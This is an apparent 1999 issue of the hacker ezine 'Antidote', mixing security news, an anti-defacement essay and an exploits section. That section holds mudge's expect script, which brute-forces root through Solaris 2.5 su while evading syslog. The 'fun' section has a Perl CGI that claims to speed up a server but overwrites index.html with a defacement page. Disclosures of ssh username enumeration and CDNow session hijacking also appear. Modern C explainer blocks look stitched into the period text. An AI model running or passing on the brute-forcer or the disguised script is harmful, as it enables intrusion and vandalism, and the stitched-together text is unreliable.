Antidote Vol. 02 Issue 09
Volume 2 Issue 9
6/19/99
** **
***** * * ** *
* *** ** *** ** **
*** ** * ** **
* ** ******** ** **** ********
* ** *** **** ******** *** *** ** * *** * ******** ***
* ** **** **** * ** *** ********* * **** ** * ***
* ** ** **** ** ** ** **** ** ** ** * ***
* ** ** ** ** ** ** ** ** ** ** ** ***
********* ** ** ** ** ** ** ** ** ** ********
* ** ** ** ** ** ** ** ** ** ** *******
* ** ** ** ** ** ** ** ** ** ** **
***** ** ** ** ** ** ** ** ****** ** **** *
* **** ** * *** *** ** *** * ***** **** ** *******
* ** ** *** *** *** *** *****
*
** http://www.thepoison.org/antidote
bof_ptr = (long *)buffer;
for (i = 0; i < bufsize - 4; i += 4)
*(bof_ptr++) = get_sp() - offs;
printf ("Creating termcap f1le\n");
printf ("b1tch is Fe3lin 1t.\n";
------------------------------
In this issue of Antidote, we have over 680 subscribers and are getting more every day! The
only thing that we ask of you when you read Antidote is that you go to:
www.thepoison.org/popup.html
and click on our sponsors. One issue of Antidote takes us about a week to put together,
and going to our sponsor only takes you about 15 seconds (if that). So please go visit
our sponsor, because it is the only thing we ask of you.
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Shouts
0.04 - Writing
1.00 - News
1.01 - AntiOnline Under Investigation
1.02 - Hacking No longer a Prank
1.03 - Deadly Worm on the Run
1.04 - US Senate Cracked AGAIN
1.05 - Voting Mouse
2.00 - Exploits (new & older)
2.01 - solaris_2.5.su.expect.cgi
2.02 - sun.useradd.expir_date.txt
2.03 - aim.ip_address.txt
2.04 - cdnow.account_access.txt
2.05 - ssh-2.0.brute_force.txt
3.00 - Misc
3.01 - I Only Replaced index.html
3.02 - virii.bat.txt
4.00 - ISS Portfolio
4.01 - wired.com
4.02 - infoworld.com
4.03 - iss_brain.ini.txt
4.04 - iss_injecter.c.txt
FUN.S - FUN STUFF, stupid things that have no purpose or reasoning. It is just
something totally stupid and MAYBE even humorous to some.
SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just
plainly making fun of something or someone.
FEAT.S - FEATURED SITES:
www.nudehackers.com
www.thepoison.org/masters/exploits2/
www.403-security.org
www.hackernews.com
------------------------------
<!-- 0.00 - Beginning //-->
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because
that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically,
is current news and happenings in the underground world. We aren't going to teach you
how to hack or anything, but we will supply you with the current information and
exploits. Mainly Antidote is just a magazine for people to read if they have some extra
time on their hands and are bored with nothing to do. If you want to read a magazine
that teaches you how to hack etc., then you might want to go to your local bookstore
and see if they carry '2600'.
------------------------------
0.02 --=\\FAQ\\=--
Here are some questions that we seem to receive a lot, or our "Frequently Asked
Questions". Please read this before e-mailing us with questions, and if the question
isn't on here or doesn't make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote is not aimed at the beginner and does not teach you the basics,
why is that?
Antidote is for everyone; all we basically are is a news ezine that comes out once
a week with the current news, exploits, flaws and even programming. All of the
articles that are in here are received second hand (sent to us) and we very rarely
edit anyone's articles.
> I just found Antidote issues on your webpage, is there any way I can get them sent
to me through e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can
input your e-mail address. You will receive a link to the current Antidote (where you
can view it).
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like
to be published above your article (when sending it to us) and we will do what you
say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent
it to us first. If you sent us something and we didn't e-mail you back, then you
might want to send it again because we probably didn't get it (we respond to all
e-mails no matter what). We might use your article in future issues of Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it
or not.
Well, that's it for our FAQ. If you have a question that is not on here, or the question
is on here and you had trouble understanding it, then please feel free to e-mail
lordoak@thepoison.org and he will answer your question. This FAQ will probably be
updated every month.
------------------------------
0.03 --=\\Shouts\\=--
These are just some shout outs that we feel we owe to some people. Some are individuals
and some are groups in general. If you are not on this list and you feel that for some
reason you should be, then please contact Lord Oak and he will post you on here; we
are sorry for the misunderstanding. Well, here are the shout outs:
Lord Oak
Duece
PBBSER
Forlorn
0dnek
EazyMoney
opt1mus
oX1dation
Retribution
www.thepoison.org
Like we said above, if we forgot you and/or you think you should be added, please
e-mail lordoak@thepoison.org and he will be sure to add you.
------------------------------
0.04 --=\\Writing\\=--
As many of you know, we are always open to articles and submissions. We will take almost
anything that has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying
"www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine. If
you have any questions about what is "acceptable" and not, please feel free to e-mail
Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please
note that if we receive two e-mails with the same topic/idea then we will use the one
that we received first. So it might be a good idea to e-mail one of us and ask whether
someone has already written on a topic, so that you don't waste your time writing
something that won't be published. An example of this would be:
If Joe sends us an e-mail with the topic being on hacking hotmail accounts on
Thursday, and then Bill sends us an e-mail on hacking hotmail accounts on Sunday, we
will take Joe's article because he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something
that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or
duece@thepoison.org and one of us will review the article and put it in Antidote (if
we like it).
------------------------------
_________________________________
) ___ (
( //___/ / // ) ) // ) ) )
) /____ / // / / __ / / (
( / / // / / ) ) )
) / / ((___/ / ((___/ / (
( http://www.403-security.org )
) For the latest hacks and news (
(___________________________________)
<!-- 1.00 - News //-->
1.01 --=\\AntiOnline Under Investigation\\=--
June 10, 1999
Brian Martin - Founder of ATTRITION
Today, Attrition staff learned that the FBI have opened investigations into
John Vranesevich and AntiOnline. Trusted sources close to the investigation
would not comment on the depth or details, but one agent would state "it
has been going on longer than you think".
When asked if Vranesevich's recent "change of mission" was in any way related
to the investigation, the agent only replied "no comment at this time."
The timing of this investigation coincides with AntiOnline's change of heart
regarding hacker activity and law enforcement. After a shocking change of
mission statement in which Vranesevich practically admits to crime, he pledges
to help law enforcement by "helping to serve, even if in some very small way."
Vranesevich goes on to say "I have been watching you these past 5 years. I
know how you do the things you do, why you do the things you do, and I know
who you are." This ominous threat was not received well by the hacker
community. A hacker called "h4r1k1r1" said "JP's 'contribution' to the
hacker community has been little more than creating FUD, and promoting
the puerile ideals of script kiddies worldwide."
One staff member from Attrition going by Punkis reminded us of the now
prophetic words from Vranesevich, who said "I could make just as much, if
not more money, by hunting down hackers and turning them in." These words
were said by Vranesevich on April 5th of this year.
(FUD means 'Fear, Uncertainty, and Doubt')
-EOF
------------------------------
1.02 --=\\Hacking No longer a Prank\\=--
[www.msnbc.com]
IN THIS DIGITAL AGE, your company whether it be an Amazon, E-Trade or some idea still
forming is built on a brand, a process and an information infrastructure. The way your
site appears on the Web; the process by which a Web visitor can maneuver and buy
products; and the ability of your site to scale, connect to suppliers and customers, and
securely maintain a digital relation will determine your success.
Sites that scale and allow you to shop comfortably in a digital store can quickly
extend their brands from books to auctions to pet foods and beyond.
Sites that crumble while you and the rest of the panicked investment community try to
bail out on a stock will find themselves abandoned and facing a new realm of legal
liabilities. Hacked sites visibly and fundamentally shake the faith in the brand and
the products being offered at the digital storefront.
This loss of faith in the brand carries over to and is magnified in the government
realm. Internet access is on the verge of becoming sufficiently ubiquitous to allow
organizational functions to move to the Web.
If the first big thing the Web allowed was personal access and community building from
the ground up, the next big thing is allowing existing organizations to use the Web to
assume previously cumbersome functions. Vote on the Web? Sure. Register your car via
the Web. File your taxes. Get your refund. All these functions are certainly possible.
What is missing is trust. Trust is a difficult dimension to describe, but it most
clearly is apparent in its absence. Don't ask a citizenry to register to vote via the
Web if the government's top legal agencies can't keep their home pages free from
graffiti.
And it is the trust that is shaken when the White House site is hacked. Or the FBI site.
Or the Senate site. Hacking is more than breaking a few minor laws. Hacking is certainly
not just being a good digital citizen by showing the security gaps that now exist to
prevent more serious transgressions in the future.
Hacking is neither clever nor funny, nor something to be tossed off as adolescent humor
from sci-fi-addled minds. Hacking retards the growth of a Web-accessible government and
should hold penalties proportional to the crime.
http://www.msnbc.com/news/278369.asp#BODY
------------------------------
1.03 --=\\Deadly Worm on the Run\\=--
[www.abcnews.go.com]
A new and very destructive computer worm, distributed much the same way as the Melissa
virus, is quickly spreading throughout computers in the United States. Hundreds, if not
thousands, of machines have already been infected.
According to anti-virus experts, the Worm.Explorer.Zip virus first started in Israel on
or about Sunday, spreading quickly to Europe. It was first reported in the United
States on Tuesday, with the bulk of reports coming in today.
If you see this window, you may already have the new worm virus. The worm then proceeds
to copy itself to the system directory with the filename Explore.exe and begins to
harvest e-mail addresses in order to propagate itself. (ABCNEWS.com)
"This worm is designed to spread from network to network very quickly," says Carey
Nachenberg, chief researcher at Symantec Corp.'s Anti-Virus Research Center. "This has
already affected thousands of machines overseas."
How It Works
The virus primarily affects users of Microsoft's Outlook e-mail program, though any
e-mail user who receives a tainted message could be in trouble. The worm enters a target
computer through an e-mail that appears to have come from someone the user e-mailed
before. It comes with a file attachment called zipped_files.exe. The text of the e-mail
customarily reads:
Hi [Recipient Name]! I received your email and I shall send you a reply ASAP. Till
then, take a look at the attached zipped docs. Bye
If a user then clicks to open that file, the worm is activated. It proceeds to randomly
destroy certain files on the target computer, then replicates itself through the e-mail
addresses in the in box.
"This doesn't work through Microsoft Word like Melissa did, and it has the potential to
spread far more rapidly," Nachenberg says.
Officials with the Computer Emergency Response Team (CERT) at Carnegie-Mellon University
in Pittsburgh have yet to figure out whether the lost data can be recovered.
Reports Continue to Come In
At least six different major corporations in the United States have reported the virus
to Symantec. CERT technical staffer Mark Zajicek says at least 20 first-hand reports
have been logged by his team, along with many second-hand reports of even more damage.
"We have no idea when this will drop off," Zajicek says. "It's safe to say that thousands
of users have been affected."
A spokeswoman for Microsoft Corp. confirmed that the company shut down its outside
e-mail this morning in order to update anti-virus and contain any outbreaks on its
Redmond, Wash., campus. The company is also planning to post letters to its Outlook
customers on how to combat the virus.
How to Stop It
The easiest thing to do to stop the worm is for computer users to be aware of it so
that they won't click on the zipped_files.exe icon to activate it. Nachenberg says that
although corporate users are far more likely to become infected by the worm, Outlook
users have learned safe computing practices from the Melissa scare, and may halt the
spread of the worm before it causes major damage.
"I think many corporations did a good job of educating their users about safe computing,"
Nachenberg says. "Hopefully this won't spread as far as the Melissa virus."
Users who see the virus in their in boxes should leave the attachment alone, delete the
e-mail, and let their system administrators know about the infection immediately.
Anti-virus software should also be used. Symantec Corp. and other anti-virus software
vendors already have patches on their Web sites.
http://www.abcnews.go.com/sections/tech/DailyNews/worm990610.html
------------------------------
1.04 --=\\US Sentate Cracked AGAIN\\=--
[www.wired.com]
For the second time in two weeks, crackers on Friday defaced the Web page of the US
Senate.
The official Senate Web site was down as of Friday afternoon while administrators
repaired and restored the network. A cracker replaced the official page with one that
said "free Kevin Mitnick, free Zyklon."
An employee of US Senate Technical Operations said the site went down around 4 p.m. EST
but couldn't say when the site might come back up.
"Those of us who haven't been hacked yet are just trying to lay low and beef up security
as we can," said Sean Donelan, a network engineer for Data Research Associates, a
nationwide Internet service provider that works with state governments, libraries, and
schools.
Donelan said that each government agency is having to reinforce security independently
and that outside vendors working with the government departments consider their security
solutions proprietary.
"[We] are also trying not to attract attention and not waving a red flag challenging
anyone to 'test' our security," Donelan said.
The Senate home page was previously cracked on 27 May. In that incident, crackers
filled the page with comments critical of the FBI. That hack was claimed by the group
Masters of Downloading, who broadcast the message "MAST3RZ 0F D0WNL0ADING, GL0B4L
D0MIN8T10N '99!" on the Senate's site.
The Varna Hacking Group claimed responsibility for the latest Web vandalism. The
organization claims it is a "noncommercial hacking group." Varna is based in Bulgaria,
according to reports of a 1998 attack that members claimed to have launched against the
Cartoon Network.
Zyklon, mentioned in Friday's incident, is alleged to be a 19-year-old hacker from
Shoreline, Washington. He was indicted in early May for his alleged involvement in
other government site hacks.
Many of the recent hacks demanded justice for imprisoned cracker Kevin Mitnick, who has
been in jail for more than four years awaiting trial on a broad swath of criminal
charges.
http://www.wired.com/news/news/politics/story/20180.html
------------------------------
1.05 --=\\Voting Mouse\\=--
[www.usnews.com]
You can already bank, buy, and bargain on the Internet. Even pay your taxes. What's
next? Voting. At least if some Louisiana politicians have their way.
The Louisiana Republican Party late last week was set to allow registered GOP voters to
cast their ballots via computer in the Jan. 29, 2000, presidential caucus. "What this
does is create thousands of polling places that never existed before," says Carey
Holliday, an attorney and member of a GOP advisory panel that voted, 5 to 2, to endorse
the use of Internet voting. After all, voters need only plunk down and switch on their
computer, tap a few keys, and civic duty accomplished.
Several legislatures are also considering allowing computer voting in statewide
elections. A pilot Pentagon program will allow residents of Florida, Missouri, South
Carolina, Texas, and Utah living abroad to vote over the Web next year.
In Louisiana, Republicans hope the move will push up voter turnout, which hovered at
an anemic 5 percent in the state's last presidential caucus in 1996. "It's been a big
problem for us," says Rep. Chuck McMains. "I think this could be a great opportunity
for people to participate and, in the process, get better representation."
Party officials blamed the abysmal showing on a lack of polling places. Recent studies
by VoteHere.Net, the software company that developed the voting system Louisiana
Republicans are considering, show computer balloting would be embraced by 76 percent of
voters ages 18 to 30 and by 50 percent of voters over age 50. What effect this would
have on who wins the elections is anybody's guess.
Hacker fraud. It sounds simple enough. Yet not everyone is convinced. Critics' major
concern: the potential for abuse. But VoteHere.Net says its program is one of the
toughest for hackers to crack or voters to fool. "Ours is the only election system that
automatically prevents tampering and box stuffing as it sniffs out voter fraud attempts
and malicious hackers," says Don Carter, senior vice president of VoteHere.Net. To
safeguard against fraud, voters would be required to provide information such as birth
dates and Social Security numbers. To preserve privacy, the system uses one of the
toughest encryption programs available to the public, says Carter, and balloters must
give a voter encrypted registration number (VERN) provided when they register to vote
via computer to guarantee they vote only once.
That's not good enough for one key dissenter. "I don't totally disagree with the
concept, but our traditional process is a good one," says party chairman Mike Francis.
His solution is to increase the voting sites. "You could give away TV sets at the
polling places, and you still wouldn't get more than 100,000 voters [out of the state's
approximately 600,000 Republicans] to show up," he says.
http://www.usnews.com/usnews/issue/990621/internet.htm
------------------------------
10001010100101110101010101001011101010101000
0 1
1 Y88b Y88 888 888 888 88e e88'Y88 0
1 Y88b Y8 888 888 888 888b d888 'Y 1
0 b Y88b Y 8888888 888 8888D C8888 1
0 8b Y88b 888 888 888 888P Y888 ,d 1
1 88b Y88b 888 888 888 88" "88,d88 0
1 1
1 http://www.nudehackers.com 0
0 0
01001010110101010001011010010111010100101011
<!-- 2.00 - Exploits //-->
2.01 --=\\solaris_2.5.su.expect.cgi\\=--
#!/usr/local/bin/expect --
# A quick little sploit for a quick round of beers :) mudge@L0pht.com
#
# This was something that had been floating around for some time.
# It might have been bitwrior that pointed out some of the oddities
# but I don't remember.
#
# It was mentioned to Casper Dik at some point and it was fixed in
# the next rev of Solaris (don't remember if the fix took place in
# 2.5.1 or 2.6 - I know it is in 2.6 at least).
#
# What happened was that the Solaris 2.5 and below systems
# had /bin/su written in the following fashion :
#
#          attempt to SU
#                |
#            successful
#              /    \
#             Y      N
#             |      |
#         exec cmd  sleep
#                     |
#                   syslog
#                     |
#                    exit
#
# There were a few problems here - not the least of which was that they
# did not bother to trap signals. Thus, if you noticed su taking a while
# you most likely entered an incorrect password and were in the
# sleep phase.
#
# Sending a SIGINT by hitting ctrl-c would kill the process
# before the syslog of the invalid attempt occurred.
#
# In current versions of /bin/su they DO trap signals.
#
# It should be noted that this is a fairly common coding problem that
# people will find in a lot of "security related" programs.
#
# .mudge
if { ($argc < 1) || ($argc > 1) } {
puts "correct usage is : $argv0 pwfile"
exit
}
set pwfile [open $argv "r"]
log_user 0
foreach line [split [read $pwfile] "\n"] {
spawn su root
expect "Password:"
send "$line\n"
# you might need to tweak this but it should be ok
set timeout 2
expect {
"#" { puts "root password is $line\n" ; exit }
}
set id [ exp_pid ]
exec kill -INT $id
}
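The ordering flaw mudge's comments describe, shown in C as an added example (this is not mudge's code and not the Solaris su source): a stand-in counter replaces syslog(3), and a small harness forks each variant, sends it SIGINT in the middle of its sleep and reports whether the failed attempt was ever recorded. The hardened variant logs before it sleeps and ignores the user-sendable signals for the duration of the delay, which is the behaviour the comments attribute to later su versions.

```c
#define _POSIX_C_SOURCE 200809L
#include <signal.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

/* Stand-in for syslog(3): each call is one failed-attempt record that made it
 * into the audit log. The child reports its count through its exit status. */
static int failures_logged = 0;
static void audit_failure(const char *user) {
    failures_logged++;
    fprintf(stderr, "AUDIT: bad password for su to %s\n", user);
}

/* Ordering the comments above describe for Solaris 2.5 su: penalty sleep
 * first, syslog afterwards, signals left at their defaults. A SIGINT (ctrl-c)
 * during the sleep terminates the process, so the log line is never reached. */
static void failed_attempt_vulnerable(void) {
    sigset_t s;
    sigemptyset(&s);
    sigaddset(&s, SIGINT);
    sigprocmask(SIG_UNBLOCK, &s, NULL);   /* make sure SIGINT can be delivered */
    signal(SIGINT, SIG_DFL);              /* default disposition, as in the original */
    sleep(1);                             /* penalty delay comes first ... */
    audit_failure("root");                /* ... so this is unreachable if interrupted */
}

/* Hardened ordering: write the audit record before any delay, and ignore the
 * signals an interactive user can send while the delay runs. Either change on
 * its own closes the hole described above; doing both costs nothing. */
static const int guarded[] = { SIGINT, SIGQUIT, SIGTERM, SIGHUP };
#define NGUARDED (sizeof guarded / sizeof guarded[0])
static void failed_attempt_hardened(void) {
    struct sigaction ign, saved[NGUARDED];
    ign.sa_handler = SIG_IGN;
    sigemptyset(&ign.sa_mask);
    ign.sa_flags = 0;
    for (size_t i = 0; i < NGUARDED; i++) sigaction(guarded[i], &ign, &saved[i]);
    audit_failure("root");                /* logged before anyone can interrupt */
    sleep(1);                             /* penalty delay, now immune to ctrl-c */
    for (size_t i = 0; i < NGUARDED; i++) sigaction(guarded[i], &saved[i], NULL);
}

/* Runs one attempt in a child, sends it SIGINT while it is sleeping, and
 * returns the number of failures the child logged, or -1 if the signal killed
 * it first (-2 on a fork/wait error). */
int logged_after_interrupt(void (*attempt)(void)) {
    pid_t pid = fork();
    if (pid < 0) return -2;
    if (pid == 0) {
        attempt();
        _exit(failures_logged);
    }
    struct timespec delay = { 0, 200000000L };   /* 200 ms: child is inside sleep() */
    nanosleep(&delay, NULL);
    kill(pid, SIGINT);
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -2;
    if (WIFSIGNALED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void) {
    printf("vulnerable ordering: %d logged (-1 = killed before syslog)\n",
           logged_after_interrupt(failed_attempt_vulnerable));
    printf("hardened ordering:   %d logged\n",
           logged_after_interrupt(failed_attempt_hardened));
    return 0;
}
```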
------------------------------
2.02 --=\\sun.useradd.expir_date.txt\\=--
This has been tested and verified only on Solaris 7.
Sun has provided a useradd binary as well as the gui (admintool) for adding
new users. This program (it's a binary in Solaris 7) allows the "-e"
parameter which purports to set the expiration date for a new account. The
man page for it says:
-e expire Specify the expiration date for a login. After
this date, no user will be able to access this
login. expire is a date entered in any format you
like (except a Julian date). If the date format
that you choose includes spaces, it must be
quoted. For example, you may enter 10/6/90 or
"October 6, 1990". A null value (" ") defeats the
status of the expired date. This option is useful
for creating temporary logins.
The key here is that it says: "in any format you like".
Using the system as it ships and using the parameter as (for example)
"-e 6/30/2000"
(in a vain attempt to avoid Y2K confusion) results in an expiration date of
June 30, 2020, so if you are expecting the user accounts to expire soon,
you will be a little disappointed. If expiration dates are critical, you
have a real problem - users can login for 20 years after you thought you
had expired them!
Workaround (supplied by Sun): replace /etc/datemsk with:
#ident
%m/%d/%y %I:%M:%S %p
%m/%d/%Y %I:%M:%S %p
%m/%d/%y %H:%M:%S
%m/%d/%Y %H:%M:%S
%m/%d/%y %I:%M %p
%m/%d/%Y %I:%M %p
%m/%d/%y %H:%M
%m/%d/%Y %H:%M
%m/%d/%y
%m/%d/%Y
%m/%d
%b %d, %Y %I:%M:%S %p
%b %d, %Y %H:%M:%S
%B %d, %Y %I:%M:%S %p
%B %d, %Y %H:%M:%S
%b %d, %Y %I:%M %p
%b %d, %Y %H:%M
%B %d, %Y %I:%M %p
%B %d, %Y %H:%M
%b %d, %Y
%B %d, %Y
%b %d
%m\%d\%H\%M\%y
%m\%d\%H\%M\%Y
%m\%d\%H\%M
%m\%d\%H
%m%d
Your mileage may vary. I have not tested this to make sure it works
correctly with 2-digit years (lower case 'y' in the mask above.)
Sun has been notified of this and of the posting to BUGTRAQ.
Chad Price
cprice@MOLBIO.UNMC.EDU
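One mechanism consistent with the 2020 result reported above, as an added example (this is not Solaris' getdate(3) and not the submitter's code): a toy matcher for the %m, %d, %y and %Y conversions is run over the first two date-only lines of the datemsk file in their listed order. With the %y line first, a parser that accepts a prefix match turns "6/30/2000" into 2020 because %y eats "20" and the trailing "00" is dropped; requiring the whole string to be consumed gives 2000.

```c
#include <stdio.h>

/* Date-only masks from the datemsk list above, in the order the file gives
 * them: the two-digit-year mask comes before the four-digit one. */
static const char *const masks[] = { "%m/%d/%y", "%m/%d/%Y", NULL };

/* Reads at most `width` digits into *out; returns the next unread character,
 * or NULL if no digit was present. */
static const char *read_num(const char *s, int width, int *out) {
    int v = 0, n = 0;
    while (n < width && *s >= '0' && *s <= '9') {
        v = v * 10 + (*s++ - '0');
        n++;
    }
    if (n == 0) return NULL;
    *out = v;
    return s;
}

/* Toy matcher written for this example (not getdate(3)). Like the C library,
 * %y consumes at most two digits and %Y at most four. Returns a pointer to
 * the first unconsumed input character, or NULL if the mask does not fit. */
static const char *match_mask(const char *s, const char *mask, int *year) {
    int v;
    for (; *mask; mask++) {
        if (*mask != '%') {
            if (*s != *mask) return NULL;   /* literal must match exactly */
            s++;
            continue;
        }
        switch (*++mask) {
        case 'm': s = read_num(s, 2, &v); if (!s || v < 1 || v > 12) return NULL; break;
        case 'd': s = read_num(s, 2, &v); if (!s || v < 1 || v > 31) return NULL; break;
        case 'y': s = read_num(s, 2, &v); if (!s) return NULL;
                  *year = (v < 69) ? 2000 + v : 1900 + v;   /* POSIX two-digit pivot */
                  break;
        case 'Y': s = read_num(s, 4, &v); if (!s) return NULL; *year = v; break;
        default:  return NULL;   /* conversion not supported by this toy */
        }
    }
    return s;
}

/* Faulty policy: accept the first mask that matches a PREFIX of the input and
 * ignore whatever is left over. "6/30/2000" fits "%m/%d/%y" with %y taking
 * "20", the trailing "00" is silently dropped and the account expires in 2020. */
int expiry_year_prefix_match(const char *input) {
    for (int i = 0; masks[i]; i++) {
        int year = -1;
        if (match_mask(input, masks[i], &year) != NULL) return year;
    }
    return -1;
}

/* Correct policy: a mask only counts if it consumes the whole input. The %y
 * mask leaves "00" unread and is rejected; "%m/%d/%Y" consumes everything
 * and yields the year the administrator actually typed. */
int expiry_year_full_match(const char *input) {
    for (int i = 0; masks[i]; i++) {
        int year = -1;
        const char *rest = match_mask(input, masks[i], &year);
        if (rest != NULL && *rest == '\0') return year;
    }
    return -1;
}

int main(void) {
    const char *sample = "6/30/2000";   /* the -e value from the report above */
    printf("%s -> prefix match: %d, full match: %d\n", sample,
           expiry_year_prefix_match(sample), expiry_year_full_match(sample));
    return 0;
}
```

Listing the %Y masks ahead of their %y twins in /etc/datemsk removes the ambiguity for either policy, which is the check to run on the workaround file before trusting expiry dates.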
------------------------------
2.03 --=\\aim.ip_address.txt\\=--
IU Uprising (iuprising@HOTMAIL.COM)
Tue, 8 Jun 1999 18:39:50 PDT
In the newest version of AIM (AOL Instant Messenger) there is a way to
transfer files. When you are transferring the file, you can open a DOS
prompt and type:
netstat -a -n
By doing this you (obviously) can get the person's IP address. Usually it
will be on port 5190. This may seem pointless because usually not much can
be done with simply an IP address, but under certain circumstances this can
be useful.
a|chEmist
------------------------------
2.04 --=\\cdnow.account_access.txt\\=--
Last week I stumbled across the following security hole in CDNow!, the
online cd-store. I emailed CDNow! regarding this immediately but as yet
have not had any confirmation of receipt or response, so I decided to post
the information here. This is a copy of the email that I sent to CDNow.
Security Hole Found
I was just looking at my gift list, and pasted the URL to a mailing list.
That is, the URL in my location bar. After doing so I thought, wait, that's
not the URL I should have posted, so I then sent the proper URL, thinking that
CDNOW is password protected and no one would be able to get to my account,
but I decided to check by telnetting to a remote machine and going to that
URL.
The result was, I got a rejected cookie, and the page continued to load my
gift list (in edit mode). I then followed a link to my account history and
details, and initiated steps to order a cd. I'm assuming the SID parameter
in the URL was looking up the open transaction/connection that I made from
my local machine and was using that.
My assumption is that this URL would only be valid for a certain amount of
time, so the security flaw will eventually in an hour or so be closed off (I
hope), however, the fact is that this hole does exist.
Mark Derricutt
DerricuttM@PBWORLD.COM
------------------------------
2.05 --=\\ssh-2.0.brute_force.txt\\=--
Aleph ... Sorry if it is an old bug ...
I have tested a bug in ssh-2.0.12.
Any remote attacker can guess real accounts on the machine.
Details
When a ssh client connects to the daemon, it has a number (default
three) of attempts to guess the correct password before
disconnecting if you try to connect with a correct login, but
you only have one if you try to connect with an incorrect login.
EXAMPLE
alfonso is not a user (login) on 192.168.0.1
$ssh 192.168.0.1 -l alfonso
alfonso's password: <hit ENTER key>
Disconnected; authentication error (Authentication method disabled.).
$
altellez is a user (login) on 192.168.0.1
$ssh 192.168.0.1 -l altellez
altellez's password: <hit ENTER key>
altellez's password:
Now the remote attacker knows that altellez is a true login on
192.168.0.1
QUICK FIX
Edit the file sshd2_config (usually at /etc/ssh2), set the value
of "PasswordGuesses" to 1.
I have only tested it with ssh-2.0.12.
Alfonso Lazaro Tellez
altellez@ip6seguridad.com
------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
FUN.S
#!/usr/bin/perl
print "Content-type: text/html\n\n";
# Make your server go faster with this script!
# Works on any OS and minor editing is needed!
$path = "/home/username/"; # homedirectory
chdir($path);
open (EDIT,">index.html");
print EDIT <<EOF;
<html><head>
<title>Lord Oak 0wnz me!</title></head>
<body><center><B><font face=arial color=black>
I b0w to Lord Oak!</font></B></center>
</body></html>
EOF
close (EDIT);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
<!-- 3.00 - Misc //-->
3.01 --=\\I Only Replaced index.html\\=--
It would appear that the k-r4d kiddies who deface web pages have no concept of WHY
their shenanigans elicit such a violent response from the companies they attack. This
brief article will list some of the behind-the-scenes events that occur after the
"harmless" replacement of index.html by our oh-so-favorite political activists.
1. The company is notified, usually by a customer, that their web page has been changed.
The server admin, Web Master, or whomever is responsible for the content is usually the
first person to be told of this event as the company probably doesn't have an incident
response plan.
2. The admin shits a brick and tells his manager. The administrator, now in fear for
his job, has to bite the bullet and tell his manager that the company has been
"hacked". He's probably afraid that the attacker got in through his weak password, or
one of the boxes he knows he should have upgraded six months ago.
3. Upon hearing this, the manager shits a brick. The mid-level manager now fears for
HIS job knowing that the brunt of upper management's wrath will fall on his shoulders
for not securing the systems. The manager tries desperately to figure out whom to tell
in upper management that will not fire him on the spot. He calls his manager (usually
a VP type) and tells her the news.
4. Upon hearing this, she freaks out and shits a brick. The VP calls Human Resources,
Legal, Security (if it exists), and the Director of Engineering or some other high-
level geek type. The group collectively decides if the site should be taken down or
remain up. A call is also made to the CEO or other chieftain to inform him of the sit-
uation. After a quick consultation with the in-house counsel, the decision to contact
or not contact law enforcement is made. Usually, the upper level types are in knee-
jerk mode and want to aggressively pursue the intruder "no matter what".
5. All this time, the overworked admin has been scouring his systems looking for traces
of how the attacker got in. Despite the attacker's claims that "he only replaced
index.html" the admin's manager wants EVERY system checked and any possible means of
entry sealed off. The admin will now try to perform a comprehensive security audit in
an hour.
6. The upper level types contact the Marketing department to figure out how to handle
the impact to the company's image. Never faced with this sort of problem before, the
Director of Marketing frets and calls all her people in for "a brainstorm" on how to
handle the situation.
7. The system is probably backed-up, taken down, and replaced with a newer box or a
significant upgrade (introducing new bugs) is made to the system. This takes the busy
admin the better part of a day. Normally, this could be accomplished in a few hours,
but with visibility at the VP and above level, the admin makes sure he does it
perfectly.
8. If law enforcement was called-in, they now spend time with the administrators and
lawyers to figure out if they have a case (probably not, most of the evidence was
accidentally destroyed by the admin in the first 4 hours after the incident).
9. Upper level types now decree that the systems will be secured and that nothing like
this will ever happen again. It's likely that big name consultants are brought in at
$200+/hour to assess the business and make recommendations to improve the site's secur-
ity. Since the admin is already busy doing day-to-day tasks, the consulting firm
probably implements their recommendations (at $200+/hour).
10. After a few weeks, things return to normal. The company has new ACLs, a new
firewall, and maybe some new policies.
Now, looking at this, one can see the number of personnel involved and the amount of
time invested in recovering from the "harmless" defacing of index.html. I haven't even
addressed the additional problems posed when the admins discover a trojanized binary or
unauthorized access to source code or other company trade secrets. This is just the
simple stuff.
"But the attacker said in his 'message' that he backed-up index.html. All they had to
do was replace it with the original!" No you stupid fool, no. The attacker has
publicly humiliated a corporation, has shown the world that the site's security is
inadequate, and has caused significant personal turmoil for 5 or more people.
Furthermore, if I come home one day to find my front door open and a note attached that
says "Hi. Broke into your place. Only moved your stuff around. Didn't take anything.
Love, r0bb3r" am I supposed to believe that? Would you? If the company affected is
publicly traded, they are legally _required_ to investigate and take measures to ensure
that a similar incident doesn't occur. If they don't, their shareholders can sue for
negligence.
Now, I can't possibly justify the tens of millions in losses claimed by companies in
cases like Mitnick or others - that's lunacy. However, reading the above, I hope it
becomes clear that there is significant time and money spent to clean up these "simple"
attacks.
-Anonymous
------------------------------
3.02 --=\\virii.bat.txt\\=--
